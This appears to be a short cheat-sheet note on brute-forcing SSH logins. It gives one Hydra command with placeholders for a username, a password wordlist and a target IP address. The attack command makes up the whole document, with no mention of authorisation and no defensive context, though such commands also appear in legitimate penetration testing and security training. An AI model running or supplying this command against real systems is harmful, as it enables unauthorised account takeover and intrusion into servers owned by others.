Brute forcing SSH with a password list

hydra -l <username> -P <path to wordlist> <IP> ssh